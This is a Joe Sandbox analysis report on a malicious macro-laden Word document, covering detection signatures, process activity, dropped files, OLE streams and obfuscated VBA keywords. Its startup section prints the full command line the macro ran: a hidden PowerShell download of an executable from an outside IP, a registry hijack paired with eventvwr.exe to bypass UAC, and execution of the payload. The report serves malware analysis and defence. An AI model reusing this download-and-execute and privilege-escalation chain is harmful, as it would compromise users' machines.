ID: 34930 Sample Name: sample1.doc Cookbook: defaultwindowsofficecookbook.jbs Time: 21:46:35 Date: 23/10/2017 Version: 20.0.0 Table of Contents
Table of Contents 2 Analysis Report 4 Overview 4 General Information 4 Detection 4 Confidence 5 Classification 5 Analysis Advice 6 Signature Overview 6 AV Detection: 7 Key, Mouse, Clipboard, Microphone and Screen Capturing: 7 Software Vulnerabilities: 7 Networking: 7 Persistence and Installation Behavior: 7 Data Obfuscation: 7 Spreading: 7 System Summary: 7 HIPS / PFW / Operating System Protection Evasion: 8 Anti Debugging: 8 Malware Analysis System Evasion: 8 Hooking and other Techniques for Hiding and Protection: 8 Language, Device and Operating System Detection: 8 Behavior Graph 9 Simulations 9 Behavior and APIs 9 Antivirus Detection 9 Initial Sample 9 Dropped Files 9 Domains 10 Yara Overview 10 Initial Sample 10 PCAP (Network Traffic) 10 Dropped Files 10 Memory Dumps 10 Unpacked PEs 10 Joe Sandbox View / Context 10 IPs 10 Domains 10 ASN 10 Dropped Files 10 Screenshot 10 Startup 11 Created / dropped Files 11 Contacted Domains/Contacted IPs 13 Contacted Domains 13 Contacted IPs 13 Static File Info 13 General 13 File Icon 14 Static OLE Info 14 General 14 OLE File "sample1.doc" 14 Indicators 14 Summary 14 Document Summary 14 Copyright Joe Security LLC 2017 Page 2 of 28 Streams with VBA 15 VBA File Name: Module1.bas, Stream Size: 3467 15 General 15 VBA Code Keywords 15 VBA Code 16 VBA File Name: ThisDocument.cls, Stream Size: 12841 16 General 16 VBA Code Keywords 16 VBA Code 20 Streams 20 Stream Path: \x1CompObj, File Type: data, Stream Size: 114 20 General 20 Stream Path: \x5DocumentSummaryInformation, File Type: FoxPro FPT, blocks size 512, next free block index 4278124544, Stream Size: 4096 20 General 20 Stream Path: \x5SummaryInformation, File Type: FoxPro FPT, blocks size 512, next free block index 4278124544, Stream Size: 4096 20 General 20 Stream Path: 1Table, File Type: data, Stream Size: 6579 20 General 20 Stream Path: Data, File Type: data, Stream Size: 108224 21 General 21 Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 409 21 General 21 Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 65 21 General 21 Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 5497 21 General 21 Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 569 22 General 22 Stream Path: WordDocument, File Type: data, Stream Size: 4096 22 General 22 Network Behavior 22 TCP Packets 22 HTTP Request Dependency Graph 22 HTTP Packets 22 Code Manipulations 23 Statistics 23 Behavior 23 System Behavior 23 Analysis Process: WINWORD.EXE PID: 3100 Parent PID: 2840 23 General 23 File Activities 24 File Created 24 Registry Activities 24 Key Created 24 Analysis Process: cmd.exe PID: 3168 Parent PID: 3100 24 General 24 Analysis Process: powershell.exe PID: 3204 Parent PID: 3168 24 General 25 File Activities 25 File Created 25 File Deleted 25 Registry Activities 25 Analysis Process: reg.exe PID: 3276 Parent PID: 3168 25 General 25 Analysis Process: eventvwr.exe PID: 3284 Parent PID: 3168 25 General 25 File Activities 26 Analysis Process: mmc.exe PID: 3304 Parent PID: 3284 26 General 26 File Activities 26 File Created 26 File Written 27 Registry Activities 27 Analysis Process: PING.EXE PID: 3384 Parent PID: 3168 27 General 27 File Activities 28 Disassembly 28 Code Analysis 28
Copyright Joe Security LLC 2017 Page 3 of 28 Analysis Report
Overview
General Information
Joe Sandbox Version: 20.0.0 Analysis ID: 34930 Start time: 21:46:35 Joe Sandbox Product: CloudBasic Start date: 23.10.2017 Overall analysis duration: 0h 4m 26s Hypervisor based Inspection enabled: false Report type: light Sample file name: sample1.doc Cookbook file name: defaultwindowsofficecookbook.jbs Analysis system description: Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Flash 26, Java 8.0.1440.1) Run name: without instrumentation Number of analysed new started processes analysed: 9 Number of new started drivers analysed: 0 Number of existing processes analysed: 0 Number of existing drivers analysed: 0 Number of injected processes analysed: 0 Technologies HCA enabled EGA enabled HDC enabled Detection: MAL Classification: mal92.evad.expl.troj.winDOC@13/10@0/1 HCA Information: Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0 EGA Information: Failed HDC Information: Failed Cookbook Comments: Found application associated with file extension: .doc Found Word or Excel or PowerPoint document Simulate clicks Number of clicks 13 Close Viewer
Warnings: Show All Exclude process from analysis (whitelisted): conhost.exe, dllhost.exe Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtCreateFile calls found. Report size getting too big, too many NtEnumerateValueKey calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found. Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: WINWORD.EXE, powershell.exe, mmc.exe
Detection
Strategy Score Range Reporting Detection
Copyright Joe Security LLC 2017 Page 4 of 28 Strategy Score Range Reporting Detection
Threshold 92 0 - 100 Report FP / FN
Confidence
Strategy Score Range Further Analysis Required? Confidence
Threshold 5 0 - 5 false
Classification
Copyright Joe Security LLC 2017 Page 5 of 28 Ransomware
Evader Spreading
mmaallliiiccciiioouusss
malicious
sssuusssppiiiccciiioouusss
Exploiter suspicious Phishing
cccllleeaann
clean
Spyware Banker
Adware Trojan / Bot
Analysis Advice
Sample HTTP request are all non existing, likely the sample is no longer working
Sample has a GUI, but Joe Sandbox has not found any clickable buttons, likely more UI automation may extend behavior
Signature Overview
• AV Detection • Key, Mouse, Clipboard, Microphone and Screen Capturing • Software Vulnerabilities • Networking • Persistence and Installation Behavior • Data Obfuscation • Spreading • System Summary • HIPS / PFW / Operating System Protection Evasion • Anti Debugging • Malware Analysis System Evasion • Hooking and other Techniques for Hiding and Protection • Language, Device and Operating System Detection
Copyright Joe Security LLC 2017 Page 6 of 28 Click to jump to signature section
AV Detection:
Antivirus detection for submitted file
Key, Mouse, Clipboard, Microphone and Screen Capturing:
Creates a window with clipboard capturing capabilities
Software Vulnerabilities:
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Document exploit detected (process start blacklist hit)
Networking:
Downloads files
Downloads files from webservers via HTTP
Tries to download non-existing http data (HTTP/1.1 404 Not Found)
Urls found in memory or binary data
HTTP GET or POST without a user agent
Uses ping.exe to check the status of other devices and networks
Persistence and Installation Behavior:
Tries to download and execute files (via powershell)
Data Obfuscation:
Powershell starts a process from the temp directory
Suspicious powershell command line found
Spreading:
Enumerates the file system
System Summary:
Checks whether correct version of .NET is installed
Executable creates window controls seldom found in malware
Found graphical window changes (likely an installer)
Copyright Joe Security LLC 2017 Page 7 of 28 Uses Microsoft Silverlight
Checks if Microsoft Office is installed
Uses new MSVCR Dlls
Binary contains paths to debug symbols
Binary contains paths to development resources
Classification label
Creates files inside the user directory
Creates temporary files
Document contains an OLE Word Document stream indicating a Microsoft Word file
Document contains summary information with irregular field values
Found command line output
Parts of this applications are using the .NET runtime (Probably coded in C#)
Reads ini files
Reads software policies
Sample is known by Antivirus (Virustotal or Metascan)
Spawns processes
Uses an in-process (OLE) Automation server
Creates mutexes
Document contains embedded VBA macros
Enables security privileges
Uses reg.exe to modify the Windows registry
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
HIPS / PFW / Operating System Protection Evasion:
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Bypasses PowerShell execution policy
Anti Debugging:
Creates guard pages, often used to prevent reverse engineering and debugging
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Enables debug privileges
Malware Analysis System Evasion:
Queries a list of all running processes
Contains long sleeps (>= 3 min)
Enumerates the file system
May sleep (evasive loops) to hinder dynamic analysis
Uses ping.exe to sleep
Hooking and other Techniques for Hiding and Protection:
Disables application error messsages (SetErrorMode)
Document contains OLE streams with high entropy indicating encrypted embedded content
System process connects to network (likely due to code injection or exploit)
Language, Device and Operating System Detection:
Queries the cryptographic machine GUID
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Copyright Joe Security LLC 2017 Page 8 of 28 Behavior Graph
Behavior Graph Legend: ID: 34930 Process Sample: sample1.doc
Startdate: 23/10/2017 Signature
Architecture: WINDOWS
Score: 92 Created File
started DNS/IP Info Is Dropped WINWORD.EXE Is Windows Process
55 24 Number of created Registry Values
Number of created Files Document exploit detected (process started start blacklist hit) Visual Basic
Delphi
cmd.exe Java
.Net C# or VB.NET
C, C++ or other language
Powershell starts Suspicious powershell Tries to download a process from command line and execute started started started started Is malicious the temp directory found files (via powershell)
powershell.exe eventvwr.exe reg.exe Processes exeeded maximum capacity for this level. 1 process has been hidden. 12 7 1
176.123.10.55, 80
AXAUTSYSRepublicofMoldovaMD Moldova Republic of
started
System process connects to network (likely due to code injection or exploit)
mmc.exe
2 26
Simulations
Behavior and APIs
Time Type Description 21:47:15 API Interceptor 1x Sleep call for process: WINWORD.EXE modified from: 60000ms to: 500ms 21:47:23 API Interceptor 5x Sleep call for process: mmc.exe modified from: 60000ms to: 500ms
Antivirus Detection
Initial Sample
Source Detection Cloud Link sample1.doc 57% virustotal Browse sample1.doc 24% metadefender Browse
Dropped Files
Copyright Joe Security LLC 2017 Page 9 of 28 No Antivirus matches
Domains
No Antivirus matches
Yara Overview
Initial Sample
No yara matches
PCAP (Network Traffic)
No yara matches
Dropped Files
No yara matches
Memory Dumps
No yara matches
Unpacked PEs
No yara matches
Joe Sandbox View / Context
IPs
Associated Sample Match Name / URL SHA 256 Detection Link Context 176.123.10.55 sample1.doc 48e78235a9858fd85e3bcb330b7 malicious Browse abcf5b9b67d9c39a7c439f2b30c8 2881224d9
Domains
No context
ASN
Associated Sample Match Name / URL SHA 256 Detection Link Context AXAUTSYSRepublicofMoldovaMD sample1.doc 48e78235a9858fd85e3bcb330b7 malicious Browse 176.123.10.55 abcf5b9b67d9c39a7c439f2b30c8 2881224d9
Dropped Files
No context
Screenshot
Copyright Joe Security LLC 2017 Page 10 of 28 Startup
System is w7 WINWORD.EXE (PID: 3100 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\Desktop\sample1.doc MD5: 5D798FF0BE2A8970D932568068ACFD9D) cmd.exe (PID: 3168 cmdline: 'C:\Windows\System32\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://1 76.123.10.55/update.x','C:\Users\HERBBL~1\AppData\Local\Temp\\sdgfusde.exe') & reg add HKCU\\Software\\Classes\\mscfile\\shell\\open\\command /d C:\Users\HERBBL ~1\AppData\Local\Temp\\sdgfusde.exe /f & eventvwr.exe & PING -n 15 127.0.0.1>nul & C:\Users\HERBBL~1\AppData\Local\Temp\\sdgfusde.exe MD5: AD7B9C14083B52BC532FBA5948342B98) powershell.exe (PID: 3204 cmdline: powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://176.123.10.55/update.x', 'C:\Users\HERBBL~1\AppData\Local\Temp\\sdgfusde.exe') MD5: 92F44E405DB16AC55D97E3BFE3B132FA) reg.exe (PID: 3276 cmdline: reg add HKCU\\Software\\Classes\\mscfile\\shell\\open\\command /d C:\Users\HERBBL~1\AppData\Local\Temp\\sdgfusde.exe /f MD5: D69A9ABBB0D795F21995C2F48C1EB560) eventvwr.exe (PID: 3284 cmdline: eventvwr.exe MD5: 91415D7EB992B77410145DD5FE453D25) mmc.exe (PID: 3304 cmdline: 'C:\Windows\system32\mmc.exe' 'C:\Windows\system32\eventvwr.msc' MD5: 6AAF3BECE2C3D17091BCEF37C5A82AC0) PING.EXE (PID: 3384 cmdline: PING -n 15 127.0.0.1 MD5: 6242E3D67787CCBF4E06AD2982853144) cleanup
Created / dropped Files
C:\Users\user\AppData\Local\Microsoft\Event Viewer\RecentViews File Type: TrueType font data MD5: D41D8CD98F00B204E9800998ECF8427E SHA1: 71AAB53EA530B694914037520A825D553CAA0928 SHA-256: 5607B57C3C58070F54B8F68FA22808F9AD14C60BBF05F00DA92A162585C3C562
Copyright Joe Security LLC 2017 Page 11 of 28 C:\Users\user\AppData\Local\Microsoft\Event Viewer\RecentViews SHA-512: 6710BB3D2CC4C560E57E0D087FA369FE1E43E537E178E5EBC417871B1A09BEABC471D5CD1BABCAF260A82563CBFB7B38903 C46C3B4C211550D7365138214551C Malicious: false
C:\Users\user\AppData\Local\Microsoft\Event Viewer\Settings.Xml File Type: ASCII text, with no line terminators MD5: D41D8CD98F00B204E9800998ECF8427E SHA1: 102E8A8F3C91A10D9D670E0B3715BD2E0ACEE5FF SHA-256: 50FD9D76D1C43BB16B166DE02AAF8ADEC09EB5BC4CEFDCA9D1AF2E0F7B1D8F64 SHA-512: B815FCBD7263B6667F01478B955F9734B1BDDBCD7CA8E62EF8FF1EC46ED99931BA466C976AC781F1BD899125571585D580F6 F232CC37B8E9ED87935981B99B78 Malicious: false
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{FF1634D7-9184-4F30-9FCD-F94560163471}.tmp File Type: FoxPro FPT, blocks size 0, next free block index 218103808, 1st used item "\375" MD5: D41D8CD98F00B204E9800998ECF8427E SHA1: DBB111419C704F116EFA8E72471DD83E86E49677 SHA-256: 4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1 SHA-512: 95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09 E1C1454AFDA519624BC2BB2F28BA4 Malicious: false
C:\Users\user\AppData\Roaming\Microsoft\MMC\eventvwr File Type: XML document text MD5: D41D8CD98F00B204E9800998ECF8427E SHA1: 34E5E6A1AFAE83241F26443BB5F0E9DAC44E42C1 SHA-256: EDFCB26CE73F3BFA4AB029A4FF1945D5A87847CBF9586F4746D091D0FCDBE2CB SHA-512: 331601C40D1999DA2A243E1EF416FF2A74BECB002A4D94ABBAFD531F078F074E7EF427B820A30E95BE594228B02E10E5D6B8 9BF45CDF27F29E0F7679FB45D4F3 Malicious: false
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat File Type: ASCII text, with CRLF line terminators MD5: D41D8CD98F00B204E9800998ECF8427E SHA1: B1818576508D2F3C35AECC500B353008D62B096F SHA-256: F1017C4BD49589EB596E205043AE1B800094CE39E4896E0DBA2A617055851B55 SHA-512: F65EC14399FDCA10E6CB458E66326BF12B4FF2B2E6C3EFE7E1C32F84E204612E178E24F19A07715A1918C8FCA156A00377274 B14655017D80F7D4669F384EED4 Malicious: false
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\sample1.LNK File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sun Sep 24 13:59:02 2017, mtime=Sun Sep 24 13:59:02 2017, atime=Mon Oct 23 19:47:13 2017, length=156160, window=hide MD5: D41D8CD98F00B204E9800998ECF8427E SHA1: E4AC98B24D183AD2662B68A34EEDFC0D46F2B617 SHA-256: 25DD09AF910FCDD26D6C66823961A54AF5D5A963B50AFA9711CA9401C561388A SHA-512: 116B7825F21C4138A0A33AF8CE3BE2E636323DFCCA9F464C79D1772C42A972B2E996F0349C06634DDD527EB722644C1F57BF5 84B98238E68729405122607A022 Malicious: false
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm File Type: data MD5: D41D8CD98F00B204E9800998ECF8427E SHA1: 9E647BCB57789C91D08C9B02D73ECD048239B5C5 SHA-256: 08B022FE12FDA6C82FEEA4C0B2736E6FF757EA90DFF28CE43E7D44CD5FB4AE36 SHA-512: A4CCFF54304DBB44144FFF7EF0027A3DE88B66CBEE24158162D30BC8ED4E8A4D3476645E1F5B76F86BAADB18EF9867116F90 0B671F7951B5FCC39BABB319C5A2 Malicious: false
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\92X7Z481N77J9BBRAJPZ.temp File Type: data MD5: D41D8CD98F00B204E9800998ECF8427E SHA1: 1FE83957C09773AB31E37807FB14C66C8FB814E7 SHA-256: CB8F6F9045E05C7A7D93E7F097D0BA527B7A155C051A89F665A23CAAAC0111A5 SHA-512: ACEAC11B5BA69EA5C4F4D1E0D7F5C8276CF0A5AFDD7F151BBCAA58B8B4CE5596F1C3EBAF051DC432DE792838C77D858D6 16150350F04D51DC1D943210F6A8E4C Malicious: false
Copyright Joe Security LLC 2017 Page 12 of 28 C:\Users\user\Desktop\~$ample1.doc File Type: data MD5: D41D8CD98F00B204E9800998ECF8427E SHA1: 9E647BCB57789C91D08C9B02D73ECD048239B5C5 SHA-256: 08B022FE12FDA6C82FEEA4C0B2736E6FF757EA90DFF28CE43E7D44CD5FB4AE36 SHA-512: A4CCFF54304DBB44144FFF7EF0027A3DE88B66CBEE24158162D30BC8ED4E8A4D3476645E1F5B76F86BAADB18EF9867116F90 0B671F7951B5FCC39BABB319C5A2 Malicious: false
\Device\Null File Type: ASCII text, with CRLF line terminators MD5: D41D8CD98F00B204E9800998ECF8427E SHA1: C84D1FA1DB5682FDB58A1A6FCD3F36A8502A229A SHA-256: F447D7FA6F09356A388501C72EED61DE33EEF436CD0E0F4219CC0F4346964339 SHA-512: 01627E41183BADD5F7FD257D16D4DFE35F30C4A967EA9EA30D9A78E868D33D9A0D05A4EAFF744A9AF38A9F0480C9835D1CE D86883CA524F8A4F9E5E0D2E4019A Malicious: false
Contacted Domains/Contacted IPs
Contacted Domains
No contacted domains info
Contacted IPs
No. of IPs < 25%
25% < No. of IPs < 50% 50% < No. of IPs < 75%
75% < No. of IPs
IP Country Flag ASN ASN Name Malicious 176.123.10.55 Moldova Republic of 15836 AXAUTSYSRepublicofMoldovaMD true
Static File Info
General
File type: 0
Copyright Joe Security LLC 2017 Page 13 of 28 General
TrID: Microsoft Word document (32009/1) 48.12% Microsoft Word document (old ver.) (19008/1) 28.57% Generic OLE2 / Multistream Compound File (8008/1) 12.04% Visual Basic Script (6000/0) 9.02% Java Script embedded in Visual Basic Script (1500/0) 2.25%
File name: sample1.doc File size: 156160 MD5: 06c9328c0164523eeaf016d0c2bdab4d SHA1: f3582f9fa404ca47f4f8f4a7f5241fa45689a9b8 SHA256: 48e78235a9858fd85e3bcb330b7abcf5b9b67d9c39a7c43 9f2b30c82881224d9 SHA512: 66c763e2fbde1bf94d42fa5cc3382f08a3e8181c3379acd 697ace04f0a754223ca446583a313fd6c0a2894da63a704 ff93178a043e2ade972450f81c24baa1ce File Content Preview: ...... >......
File Icon
Static OLE Info
General Document Type: OLE Number of OLE Files: 1
OLE File "sample1.doc"
Indicators Has Summary Info: True Application Name: Microsoft Office Word Encrypted Document: False Contains Word Document Stream: True Contains Workbook/Book Stream: False Contains PowerPoint Document Stream: False Contains Visio Document Stream: False Contains ObjectPool Stream: False Flash Objects Count: 0 Contains VBA Macros: True
Summary Code Page: 1252 Title: Subject: Author: User Keywords: Comments: Template: Normal Last Saved By: user Revion Number: 4 Total Edit Time: 0 Create Time: 2017-01-20 00:05:00 Last Saved Time: 2017-02-21 02:29:00 Number of Pages: 1 Number of Words: 0 Number of Characters: 2 Creating Application: Microsoft Office Word Security: 0
Document Summary Document Code Page: 1252
Copyright Joe Security LLC 2017 Page 14 of 28 Document Summary Number of Lines: 1 Number of Paragraphs: 1 Thumbnail Scaling Desired: False Company: Contains Dirty Links: False Shared Document: False Changed Hyperlinks: False Application Version: 917504
Streams with VBA
VBA File Name: Module1.bas, Stream Size: 3467
General Stream Path: Macros/VBA/Module1 VBA File Name: Module1.bas Stream Size: 3467 Data ASCII: ...... H ; ...... x ...... M E ...... Data Raw: 01 16 01 00 00 f0 00 00 00 dc 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff e3 02 00 00 9f 09 00 00 00 00 00 00 01 00 00 00 d1 1c 48 3b 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
VBA Code Keywords
Keyword 'choosesalt pledge "gvoozqvcgagcgoo" crashtrial VB_Name plateunit 'xhpitkjky handstable jbxaykeetysymgufg.Run(sfkcgtjrevbwrnwblsf, dollendless 'qcdtqntopnbkuymwe cottonliquid ownsecond "modifyolive" closeshare Function "kedmaatfrfotkgmsd" "bunkersyrup" cablemove hivfbwyoqfnxeonjhrp 'uqllilltmei "strongtruck" 'svnfkokzcvugwy "pevlzgbjpokk" "runsand" "iuadxkspm" coiltruly 'igcqavcjmhiboyv nvlwsxrcvuuf sfkcgtjrevbwrnwblsf, ktnrbptreiyxaadjenc dgenfjacueyheqqiox dbwszhxdnq ftulafwijjz assumefabric ktnrbptreiyxaadjenc) burdentopic
Copyright Joe Security LLC 2017 Page 15 of 28 Keyword 'airporteither becomeitem dveqaufcyblmxevof gqawrfnle 'gvlguivgr 'crseqohactn jbxaykeetysymgufg, 'dialfluid lbeaibupyfqaqxkfqat "zfxhuxxmuingtejzb" coilfunny 'xzmtpnevxixlz absurdbuild Attribute 'staytext dinneroriginal) mentionreason(dinneroriginal, "vyasvtgivzgbrtme" benefitinvite 'argueprogram mentionreason 'kfxqdugcacuqoieuun
VBA Code
VBA File Name: ThisDocument.cls, Stream Size: 12841
General Stream Path: Macros/VBA/ThisDocument VBA File Name: ThisDocument.cls Stream Size: 12841 Data ASCII: ...... F ...... M . . . 9 ...... c ...... 0 . . U 0 . - E . ) . . S . . { . . S 5 . 4 . E . . . . . * ...... a . ` | o . H . . 4 J . k ...... x ...... M E ...... Data Raw: 01 16 01 00 00 00 01 00 00 46 04 00 00 e4 00 00 00 ea 01 00 00 ff ff ff ff 4d 04 00 00 39 20 00 00 00 00 00 00 01 00 00 00 d1 1c ea 63 00 00 ff ff a3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 30 c6 a9 55 30 94 2d 45 b0 29 dc 04 53 c7 09 7b b1 bd 53 35 81 34 f5 45 b4 a2 d0 aa da 2a 89 b7 00 00 00 00 00 00 00 00 00 00 00 00 00
VBA Code Keywords
Keyword 'daoqzcfhejetulopipf 'songspin shortwater "feelsunset" "maidsnow" bitteruniform "considermango" 'royalvolume 'shifttragic midnightpipe Public blushexplain "zgnihfkmhhd" 'meltrain cattlefoot "xmsbyyvodxkhjzjk" "bvlqhbeylvddn" omqjumyxr 'cqsvbyobkq ActiveDocument.Shapes.SelectAll 'addnetwork gatesponsor Copyright Joe Security LLC 2017 Page 16 of 28 Keyword 'buyerdemise 'patslempjrypnok debrismeadow 'blessbulb Y/YcL zaqjysukrndll bsyixqsekpghdutrnl "vkzsslxsugrg" ZY-LwAJ 'tzahoeipjforwmdy qhrjjdwrroug Document_Open() oapuldmdkygm rozdrrbri, 'gafjsetjtvqjb cmqpihuzandngttgun 'yzboeyopqvucjxi "tkicoykbdam" vrjrxwzomczbkooi "zzqkprispegehi" dwarfreturn 'ecpmwktdqivwdsf False eggpeanut "LcZZmZdB.VZeALxAeBZ kvrgtoslkfpwuldalmo abstractsilver Mid(gatesponsor, "ellezwlycdrxohgd" "busyclient" yzljnoykmbrq 'ynsjvephmwpb 'amateurcrucial 'greatrule 'fgfyquryoavyauckleu 'kmlkxusssmqv nrzatmhxj cramextend arenatragic 'pioneerweather brickrough qdibdopids 'lkgnwyvzjnzszzrb itcwyqdpzzj 'vbzftwxepjitume qilmynflbayx 'dismissinner pzrocxrtpkbtwzqygln 'gifcgbspxaqylvqupte coraloutput() gridsyrup gpgjkaexexdviix taskview "ipt." 'lonvpicrisgxrxcyeeg "comicsimilar" 'jhqlbqabnaljtlou 'tbmpivbrjeki alsoother, rozdrrbri alsoother industryreport cigarspray 'almostretreat
Copyright Joe Security LLC 2017 Page 17 of 28 Keyword roastswing busytag indexrepair rajhobcwvwtvm 'yozouzaldrnlgeuqfmj "hzscxuezczrftedwex" "xrboczvbcwd" "aroundjoin" 'ghukxdlosmrioqcad spherestamp "ThisDocument" 'aunacvpiamodnob mlxgcercg 'nhjsnswwdeua 'rdjnwnhbhrqowzufm 'utkmitusnkkzdhuosk tojyqhtbps practiceprevent eiathpcnnvwrhf coyotehalf groceryhint 'hxvyyopevlrmodqg frequentfuture JhLiqqdZdYqeZLnLL 'qkkjipowvnjrz "exoticexpect" dividenurse ytrwhtddxmfqrafbtvg 'dreamsheriff 'ydtwxgyjx averageflock wszljijqltsjufs VB_Creatable rjrdvfmnotje arrangediscover VB_Exposed caughtminimum dzjehrnyjfmhjpuo endtennis LrqAeZgLA loovvcfmwwr 'pzittciniyawxc 'bamarkoqlcuwstyvzyl clutchfeel "wscr" bniufpymjhe 'canexist uxfnbvpqjpa 'feesetup nxobsppqyihqkjhktoy "cgpnjqcdmqzkbu" vighglysnqunompqy 'crimeicon canalsoccer 'vbstuxymbksohaxvz 'kwegjtyofyguqjy 'iyrvxzdhen modifyripple practiceprevent, 'claimwealth scripttaxi "meshspray" forgetprimary 'conductenter
Copyright Joe Security LLC 2017 Page 18 of 28 Keyword 'zsjcyvvmq Attribute cracofnqfisiv inmatevast 'gaugeslogan "shell" 'alsohabit effortinner 'afraidphoto VB_PredeclaredId VB_GlobalNameSpace 'aejotroiuqbo "mxsvryofao" boyequip dirbowfpohurs 'cubepayment VB_Name "analystdawn" 'customgate pzudvmfoetrdjzmqn besttuna "hoteltaxi" 'kpexmknsncopurilto 'ewvflehefksijsilejd 'mugwkovzkqqrpnguz coraloutput Function ourkxcdaygvhnguz "cruiseweapon" foammilk baqkeayrmbzpgovdu lgwldxbgzxolpuwgguq 'givepurchase 'clmafpjpsskatxvlgt "librarytask" Len(gatesponsor) broomtalk "pathsaddle" VB_Customizable glareneutral "maidroad" bmxvudvhvvvmgsyr Join(coconutfrost, "xadcuvgugsrdy" 'xaoheotlzteedwbymd "kuectfyfxfxeapwoc" fathabit VB_Base obeyvivid gazesort "habitusual" doveoccur "canalwait" Selection.Delete VB_TemplateDerived 'nclpvluhoejqsnfg 'muffintrade blastfresh alarmtwenty CreateObject(bniufpymjhe()) 'vcuhwdxxp "xlwkuzszwjniijjjg" bniufpymjhe() insidemiracle
Copyright Joe Security LLC 2017 Page 19 of 28 Keyword 'dumbraise elementwalk "mvxcaotsvuwxbyjlh" Z/LqfJ yjsgwogvzwkzqn
VBA Code
Streams
Stream Path: \x1CompObj, File Type: data, Stream Size: 114
General Stream Path: \x1CompObj File Type: data Stream Size: 114 Entropy: 4.2359563651 Base64 Encoded: True Data ASCII: ...... F . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q ...... Data Raw: 01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
Stream Path: \x5DocumentSummaryInformation, File Type: FoxPro FPT, blocks size 512, next free block index 4278124544, Stream Size: 4096
General Stream Path: \x5DocumentSummaryInformation File Type: FoxPro FPT, blocks size 512, next free block index 4278124544 Stream Size: 4096 Entropy: 0.244287490812 Base64 Encoded: False Data ASCII: ...... + , . . 0 ...... h ...... p ...... | ...... Data Raw: fe ff 00 00 06 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00
Stream Path: \x5SummaryInformation, File Type: FoxPro FPT, blocks size 512, next free block index 4278124544, Stream Size: 4096
General Stream Path: \x5SummaryInformation File Type: FoxPro FPT, blocks size 512, next free block index 4278124544 Stream Size: 4096 Entropy: 0.430807633551 Base64 Encoded: False Data ASCII: ...... O h . . . . . + ' . . 0 . . . h ...... $ ...... 0 ...... < ...... H ...... P ...... X ...... ` ...... U s e r ...... Data Raw: fe ff 00 00 06 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 68 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 a4 00 00 00 04 00 00 00 b0 00 00 00 05 00 00 00 c0 00 00 00 06 00 00 00 cc 00 00 00 07 00 00 00 d8 00 00 00 08 00 00 00 e8 00 00 00 09 00 00 00 f8 00 00 00
Stream Path: 1Table, File Type: data, Stream Size: 6579
General Stream Path: 1Table File Type: data Stream Size: 6579 Entropy: 5.97339037308 Base64 Encoded: True
